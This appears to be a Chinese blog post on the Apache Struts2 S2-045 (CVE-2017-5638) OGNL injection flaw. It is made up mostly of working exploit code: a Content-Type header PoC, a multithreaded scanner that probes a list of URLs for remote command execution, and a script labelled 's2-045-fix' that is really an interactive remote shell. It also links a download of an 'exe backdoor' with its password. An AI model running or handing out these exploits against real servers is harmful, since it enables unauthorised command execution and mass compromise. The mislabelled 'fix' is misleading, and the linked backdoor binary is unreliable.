原理分析
官方公告
https://cwiki.apache.org/confluence/display/WW/S2-045
S2-045 原理初步分析(CVE-2017-5638) - seebug
http://paper.seebug.org/241/
S2-045 分析
http://blog.csdn.net/u011721501/article/details/60768657
PoC
1 2 3 4 5 6 7 8 9 10
| import requests import sys header = dict() header['Content-Type'] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('test'+602+53718)).(#o.close())}" s = requests.get(sys.argv[1], headers=header) print s.content
|
Exploit
多线程检测
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
| import urllib2 from poster.encode import multipart_encode from poster.streaminghttp import register_openers import threading def poc(url): register_openers() datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")}) header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo nMask').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" try: request = urllib2.Request(url,datagen,headers=header) response = urllib2.urlopen(request,timeout=5) body=response.read() except: body="" if "nMask" in body: print "[Loopholes exist]",url f.write(url+"\n") else: print "Loopholes not exist",url if __name__=="__main__": ''' url.txtΪŽýŒì²âurlÁбí result.txtΪŒì²âÍêÊä³öœá¹ûÎÄŒþ ''' f=open("result.txt","a") url_list=[i.replace("\n","") for i in open("url.txt","r").readlines()] for url in url_list: threading.Thread(target=poc,args=(url,)).start() while 1: if(len(threading.enumerate())<50): break
|
s2-045-fix
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22
| import urllib2 import sys from poster.encode import multipart_encode from poster.streaminghttp import register_openers def poc(): cmd = raw_input('cmd > ') if cmd != 'exit': register_openers() datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")}) header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" header["Content-Type"]="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd="+"'"+cmd+"'"+").(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" request = urllib2.Request(str(sys.argv[1]), datagen, headers=header) response = urllib2.urlopen(request) print(response.read()) else: sys.exit() if __name__ == "__main__": while True: poc()
|
exe 后门待检测
链接: https://pan.baidu.com/s/1i5qktIt 密码: 23v4
别做伸手党 给个反馈 点个赞 都可以
来老铁 双击666
解压密码 secquan.org
经济影响
安恒
公布PoC之后立刻提供防御服务。
